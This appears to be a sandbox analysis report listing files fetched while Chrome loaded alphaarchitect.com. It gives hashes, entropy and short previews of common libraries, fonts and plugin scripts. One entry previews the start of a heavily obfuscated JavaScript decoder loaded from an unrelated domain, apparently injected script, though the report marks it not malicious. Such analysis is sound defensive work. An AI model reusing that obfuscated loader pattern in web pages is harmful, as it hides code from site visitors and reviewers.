                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-includes/js/underscore.min.js?ver=1.13.7
                                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.!function(n,t){var r,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define("underscore",t):(n="undefined"!=typeof globalThis?globalThis:n||self,r=n._,(e=n._=t()).noConflict=function(){return n._=r,e})}(this,function(){var n="1.13.7",t="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},e=Array.prototype,V=Object.prototype,F="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=V.toString,q=V.hasOwnProperty,r="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=r&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):18536
                                                                                                                                                                                                                                                                        Entropy (8bit):7.986571198050597
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
                                                                                                                                                                                                                                                                        MD5:8EFF0B8045FD1959E117F85654AE7770
                                                                                                                                                                                                                                                                        SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                                                                                                                                                                                                                        SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                                                                                                                                                                                                                        SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                                                        Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8546
                                                                                                                                                                                                                                                                        Entropy (8bit):4.6197785411836065
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:L9FZ9W52LGIJMA79SL0hF4BTrTQKbho3VZGvToYF4oUBBV8q1gpMTPGMf9e9two8:LbqYLGIyAwFVo3VZg4LoXpMTO8o9aF
                                                                                                                                                                                                                                                                        MD5:F4996938F1D8018E3333A8F8B49044CE
                                                                                                                                                                                                                                                                        SHA1:FB999CBC605F0AA8060CBB3CF8A312E07C062F89
                                                                                                                                                                                                                                                                        SHA-256:A89E0E8AB8DE6667A3B107FFB9269BC63F2999839C22D781199179B8711C604C
                                                                                                                                                                                                                                                                        SHA-512:D0673E409476CFDEDB6A231C1FF21EE486E2B0400E5E61B8A746DD92E9946F3CD79D88E05A44A44041F037FF75494560CB553EA97686007BC1A7B06D60128BE9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="44" height="46" viewBox="0 0 44 46" fill="none">. <path opacity="0.5" d="M30 28H26V32H30V28Z" fill="#0074BF"/>. <path opacity="0.7" d="M26 28H22V32H26V28Z" fill="#0074BF"/>. <path opacity="0.7" d="M22 28H18V32H22V28Z" fill="#0074BF"/>. <path opacity="0.5" d="M18 28H14V32H18V28Z" fill="#0074BF"/>. <path opacity="0.7" d="M34 24H30V28H34V24Z" fill="#0082BF"/>. <path opacity="0.8" d="M30 24H26V28H30V24Z" fill="#0082BF"/>. <path d="M26 24H22V28H26V24Z" fill="#0082BF"/>. <path d="M22 24H18V28H22V24Z" fill="#0082BF"/>. <path opacity="0.8" d="M18 24H14V28H18V24Z" fill="#0082BF"/>. <path opacity="0.7" d="M14 24H10V28H14V24Z" fill="#0082BF"/>. <path opacity="0.5" d="M38 20H34V24H38V20Z" fill="#008FBF"/>. <path opacity="0.8" d="M34 20H30V24H34V20Z" fill="#008FBF"/>. <path d="M30 20H26V24H30V20Z" fill="#008FBF"/>. <path d="M26 20H22V24H26V20Z" fill="#008FBF"/>. <path d="M22 20H18V24H22V20Z" fill="#008FBF"/>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):203
                                                                                                                                                                                                                                                                        Entropy (8bit):5.139523437629011
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                                                                                                                                                                                                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                                                                                                                                                                                                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                                                                                                                                                                                                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                                                                                                                                                                                                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (31140), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):31140
                                                                                                                                                                                                                                                                        Entropy (8bit):4.9734766038689875
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:5eWJMiQmjuUUsglTIjP8lq0RTM0fLyGhgyf3gf/K0y9C3YZsB342Ph56q+:KLxgznK0SIvw
                                                                                                                                                                                                                                                                        MD5:534379850C96EB3109C2D81609812657
                                                                                                                                                                                                                                                                        SHA1:0FC88551DDE13D0BB1D6829C5B632B5E70531AB9
                                                                                                                                                                                                                                                                        SHA-256:30CD94BA385DDCFF4F1F56DD03CA8580608F0289817D2007336CD60F0C0F75BC
                                                                                                                                                                                                                                                                        SHA-512:7B83948610EA4250D193BC2BC57BF74F50D8447B1225B6A739F24715617FE79A2FDAF4DBCD95856E4FEF1E741A6F32BF1F030E56E3CE445CC8C62F333DABE6E4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==
                                                                                                                                                                                                                                                                        Preview:function a0_0xfbc8(_0x1c8665,_0x3bbc93){var _0x3f1d72=a0_0x5232();return a0_0xfbc8=function(_0x23dcb0,_0x518a69){_0x23dcb0=_0x23dcb0-(-0xe9*0x1d+0x1114+0xa0d);var _0x40598d=_0x3f1d72[_0x23dcb0];if(a0_0xfbc8['zOVyDT']===undefined){var _0x2552da=function(_0x197ba4){var _0x197741='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0xb209bd='',_0x1dc12d='';for(var _0x18393b=0x64c*0x5+0x2438*0x1+-0x43b4,_0x736740,_0x9921fe,_0x24367e=0x1*0x8f5+-0x301+-0x1fc*0x3;_0x9921fe=_0x197ba4['charAt'](_0x24367e++);~_0x9921fe&&(_0x736740=_0x18393b%(-0x24a*0x3+-0xc65+-0x3*-0x66d)?_0x736740*(-0x377*0x7+-0x35*0x2d+0x21d2)+_0x9921fe:_0x9921fe,_0x18393b++%(0x1a3a+-0x1e*0xb4+0x51e*-0x1))?_0xb209bd+=String['fromCharCode'](-0x135d+-0x1c1*0x3+0x199f&_0x736740>>(-(-0x81c*0x4+0x13b*0xb+0x12e9)*_0x18393b&0x340*0xb+0x1c9d+-0x4057)):-0xce9+-0x2391+0x49*0xaa){_0x9921fe=_0x197741['indexOf'](_0x9921fe);}for(var _0x3608e7=0xd76+0xde7+0x1b5d*-0x1,_0x4eba53=_0xb209bd['length'];_0x3608e7<_0x4eba53;_0x36
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):203
                                                                                                                                                                                                                                                                        Entropy (8bit):5.139523437629011
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                                                                                                                                                                                                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                                                                                                                                                                                                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                                                                                                                                                                                                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                                                                                                                                                                                                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):87553
                                                                                                                                                                                                                                                                        Entropy (8bit):5.262620498676155
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                                                                                                                                                                                        MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                                                                                                                                                                        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                                                                                                                                                                        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                                                                                                                                                                        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8895), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):8895
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1251289667237225
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:D8jTLvUij0QmHZtv6M5+q605tlcOGPkhNJI4IMu1NfN+A6HzRA:D8jTLvU3QmHPir0tlcOGPeIvZlXszRA
                                                                                                                                                                                                                                                                        MD5:779E173355A9E7DC02719A810A9B0A2D
                                                                                                                                                                                                                                                                        SHA1:511A81D84AB7451ADB101A8D7EC654E52D3CC92B
                                                                                                                                                                                                                                                                        SHA-256:229960D85C76FD1F3B427FF01039D98723632BC030C4BDC687057F5D3B35CD05
                                                                                                                                                                                                                                                                        SHA-512:109A964DCCCB1394DA9A612ACDE2C981EC4846D55F75D0859D9F096D86A8D65E7B146A7AC6FBBCC3E6885296AED40E30DFB33605FEF4DE405B674A9C18B6473B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.time.min.js?ver=3.6.2
                                                                                                                                                                                                                                                                        Preview:!function(t){"function"==typeof define&&define.amd?define(["./picker","jquery"],t):"object"==typeof exports?module.exports=t(require("./picker.js"),require("jquery")):t(Picker,jQuery)}(function(t,l){var e,m=60,n=1440,h=t._;function i(n,a){var t,e=this,i=n.$node[0].value,r=n.$node.data("value"),i=r||i,r=r?a.formatSubmit:a.format;e.settings=a,e.$node=n.$node,e.queue={interval:"i",min:"measure create",max:"measure create",now:"now create",select:"parse create validate",highlight:"parse create validate",view:"parse create validate",disable:"deactivate",enable:"activate"},e.item={},e.item.clear=null,e.item.interval=a.interval||30,e.item.disable=(a.disable||[]).slice(0),e.item.enable=-(!0===(t=e.item.disable)[0]?t.shift():-1),e.set("min",a.min).set("max",a.max).set("now"),i?e.set("select",i,{format:r}):e.set("select",null).set("highlight",e.item.now),e.key={40:1,38:-1,39:1,37:-1,go:function(t){e.set("highlight",e.item.highlight.pick+t*e.item.interval,{interval:t*e.item.interval}),this.render
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15973)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):421916
                                                                                                                                                                                                                                                                        Entropy (8bit):5.644936017747292
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:t47AlnYnsmQ8HQZ1HcRCrZHe5NAoEZMf3/Nxfq+uT+bo3Y:m7ULm9HQ7Hc81e5azwYY
                                                                                                                                                                                                                                                                        MD5:A0952804F28C2E050AAA677AA18E65E2
                                                                                                                                                                                                                                                                        SHA1:FAEC075F6525DAF594EBEE3AFA9B2A8ECCC64909
                                                                                                                                                                                                                                                                        SHA-256:2AC7433451DE95FD22A2614E004055E601585A8387D4E8E6D529FF48DBF0586A
                                                                                                                                                                                                                                                                        SHA-512:59113670B10BEC1086003C749E01A58287177BD0D92DDEE11A468CFA7D478DBCF2CBB30381A28B7F6C7D7BB1118007560511B124919A31E64F1FD28B80FA54C4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-DJ0HWC0D2K
                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":16,"vtp_value":true,"tag_id":107},{"function":"__ogt_referral_exclusion","priority":16,"vtp_includeConditions":["list","alphaarchitect\\.com"],"tag_id":109},{"function":"__ogt_session_timeout","priority":16,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":110},{"function":"__ogt_1p_data_v2","priority":16,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (52187)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):417973
                                                                                                                                                                                                                                                                        Entropy (8bit):5.216951452496629
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:Y6mmF0d7tsbROQA5/1RBXNqF9BaW223OdZRD+fJXbHwlzpiqoM1Z2lVz2U5bL91z:YW6tsbROQo/qPBqw4K
                                                                                                                                                                                                                                                                        MD5:F87EED779775EFC3F6E232933500E122
                                                                                                                                                                                                                                                                        SHA1:68555D30B45D99A6644642AA4804C04BF2B66F50
                                                                                                                                                                                                                                                                        SHA-256:D85233236E19E08F95150E682472A35740F8FFFB62B2663A4B2FC4B62E24686D
                                                                                                                                                                                                                                                                        SHA-512:AB21B205A1D27D1012048BCFF3F907D8CD74A045ACC317321F2D9101A111C4B7C650DEF00DBAC8BF62B40B1FDAD008AA2446CC00CFE219075F50252918034763
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html class="avada-html-layout-wide avada-html-header-position-top" lang="en-US">.<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><script>if(navigator.userAgent.match(/MSIE|Internet Explorer/i)||navigator.userAgent.match(/Trident\/7\..*?rv:11/i)){var href=document.location.href;if(!href.match(/[?&]nowprocket/)){if(href.indexOf("?")==-1){if(href.indexOf("#")==-1){document.location.href=href+"?nowprocket=1"}else{document.location.href=href.replace("#","?nowprocket=1#")}}else{if(href.indexOf("#")==-1){document.location.href=href+"&nowprocket=1"}else{document.location.href=href.replace("#","&nowprocket=1#")}}}}</script><script>(()=>{class RocketLazyLoadScripts{constructor(){this.v="1.2.6",this.triggerEvents=["keydown","mousedown","mousemove","touchmove","touchstart","touchend","wheel"],this.userEventHandler=this.t.bind(this),this.touchStartHandler=this.i.bind(this),this.touchMoveHandler=this.o.bind(this),this.touchEndHandler=this.h.bind(this),this.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7237), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):7237
                                                                                                                                                                                                                                                                        Entropy (8bit):5.262940477428554
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:kx1pvABOi26Pf9ZWrjW8EDRg+NfJPcglNJ/py:81pv0OidIrjW8EDRg+NfJEmHpy
                                                                                                                                                                                                                                                                        MD5:682B2C929AC216F0C7536A27A446631E
                                                                                                                                                                                                                                                                        SHA1:2CFADFCBDC559D8E32ABB2FE4DFB3FDFC2351A83
                                                                                                                                                                                                                                                                        SHA-256:7C8E0DFA6A9519EE45740B330731CD145F62EE2B2D6F9C9B5AA618457ADD25CD
                                                                                                                                                                                                                                                                        SHA-512:94181B3759D47148C5E45D59861AB90A69EADB62C0FD24156F6E13B90D70BCCCCAF32244A2AC43BB869BDFFFF512A6B9D1CCB378F73B9E71C3CAB4700926F9AE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function avadaLightBoxInitializeLightbox(){window.$ilInstances&&jQuery.each(window.$ilInstances,function(t,i){window.$ilInstances[t].destroy()}),window.avadaLightBox.initialize_lightbox()}window.avadaLightBox={},void 0===window.$ilInstances&&(window.$ilInstances={}),window.avadaLightBox.initialize_lightbox=function(){"use strict";1===Number(fusionLightboxVars.status_lightbox)&&(window.avadaLightBox.set_title_and_caption(),window.avadaLightBox.activate_lightbox())},window.avadaLightBox.activate_lightbox=function(t){"use strict";var i,e=[],o=1;void 0===t&&(t=jQuery("body")),t.find('[data-rel^="prettyPhoto["], [rel^="prettyPhoto["], [data-rel^="iLightbox["], [rel^="iLightbox["]').each(function(){var t,i,o,a,n=["bmp","gif","jpeg","jpg","png","tiff","tif","jfif","jpe","svg","mp4","ogg","webm","webp"],r=0,s=jQuery(this).attr("href");for(void 0===s&&(s=""),t=0;t<n.length;t++)r+=String(s).toLowerCase().indexOf("."+n[t]);i=/http(s?):\/\/(www\.)?vimeo.com\/(\d+)/,s.match(i)&&(r=1),i=/^.*((youtu.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (417), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):417
                                                                                                                                                                                                                                                                        Entropy (8bit):4.769142915295247
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:A9zOtDHpYN1agI+wvpeGXzvXzDeyYN1yzOti1jzDeyYN1yzOti1V:Jpg1aVv0GXzvXzDW1YjzDW1YV
                                                                                                                                                                                                                                                                        MD5:E44F2BC78365AD8E43248A046EA6B0C7
                                                                                                                                                                                                                                                                        SHA1:CC43C525B6A08371A8C68F37A48B940A001191F1
                                                                                                                                                                                                                                                                        SHA-256:14F4C2F22D0161BAEFFDE711B7B3842DDE08F396A8ECF3E3C77149A1A872DA81
                                                                                                                                                                                                                                                                        SHA-512:5550D24E905DA1F83F23AAD06DFB849C8F008BD76CB089A640B3BE2EFFC0C3AE10F85946A125C3CACA8507F97E5FBE3FF51371C3AB84258A61B6DE3521CD74AB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function fusionResizeCrossfadeImagesContainer(e){var i=0;e.find("img").each(function(){var e=jQuery(this).height();e>i&&(i=e)}),e.css("height",i)}jQuery(window).on("load",function(){jQuery(window).on("resize",function(){jQuery(".crossfade-images").each(function(){fusionResizeCrossfadeImagesContainer(jQuery(this))})}),jQuery(".crossfade-images").each(function(){fusionResizeCrossfadeImagesContainer(jQuery(this))})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4366), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4366
                                                                                                                                                                                                                                                                        Entropy (8bit):5.039727248640846
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:DqwDdwd5Rh4QVKmvF0gCKzNxvzgsrpXGvu4rEwp:GVigcigp4y
                                                                                                                                                                                                                                                                        MD5:C705EF91638E363C8889578125C08E36
                                                                                                                                                                                                                                                                        SHA1:DE12F676DCB87743C24A18BA64DC0A3746F7FB18
                                                                                                                                                                                                                                                                        SHA-256:31E6722068108FDA3FFDD3275ABFC3600930E7DAC9597C7948AB931E8B72AD56
                                                                                                                                                                                                                                                                        SHA-512:E4501054D8033CAA48DFA2A7DABE512E00DB3FF8D0BC48E7A934A3983B6980FABD02C1CF9B5539E7A93E03CFF6E476122970997053CF192B126F57CF409138CF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/tipsy/tipsy.min.js?ver=1.0.0a
                                                                                                                                                                                                                                                                        Preview:!function(a){function l(t,e){return"function"==typeof t?t.call(e):t}function h(t,e){this.$element=a(t),this.options=e,this.enabled=!0,this.fixTitle()}h.prototype={show:function(){var t=this.getTitle();if(t&&this.enabled){var e,i=this.tip(),s=(i.find(".tipsy-inner")[this.options.html?"html":"text"](t),i[0].className="tipsy",i.remove().css({top:0,left:0,visibility:"hidden",display:"block"}).prependTo(document.body),a.extend({},this.$element.offset(),{width:this.$element[0].offsetWidth,height:this.$element[0].offsetHeight})),n=i[0].offsetWidth,o=i[0].offsetHeight,t=l(this.options.gravity,this.$element[0]);switch(t.charAt(0)){case"n":e={top:s.top+s.height+this.options.offset,left:s.left+s.width/2-n/2};break;case"s":e={top:s.top-o-this.options.offset,left:s.left+s.width/2-n/2};break;case"e":e={top:s.top+s.height/2-o/2,left:s.left-n-this.options.offset};break;case"w":(extra_gap=0)<a("body").css("position").length&&"relative"==a("body").css("position")&&a("#wpadminbar").length&&(extra_gap=a("
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2247), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2247
                                                                                                                                                                                                                                                                        Entropy (8bit):5.003381601922124
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:kMAjxNYqtOAC8yg3iQLOrvxy3TMucmndS5cpy/qBsH1H9yGbBsH1A:ijxNYqthy3FSEyoqBsVH9TBsVA
                                                                                                                                                                                                                                                                        MD5:3726C80E7C1C9D64287C58EC756279B3
                                                                                                                                                                                                                                                                        SHA1:681AB090CFA5394430741893F9C31C0EA9406528
                                                                                                                                                                                                                                                                        SHA-256:AD0BAA02C1B210A908931AB28087269837073A0C2C7E44368B74E0A56430F2C7
                                                                                                                                                                                                                                                                        SHA-512:CA1D922ABB448BC58343E32E669A3E9728E134D968580CD880BBCA077717E37029C573F83CF0C7B88EC8E1CF27F3636E0BFCC768A88827D7439AFF2F8F4AC0A2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-video.js?ver=1733842125
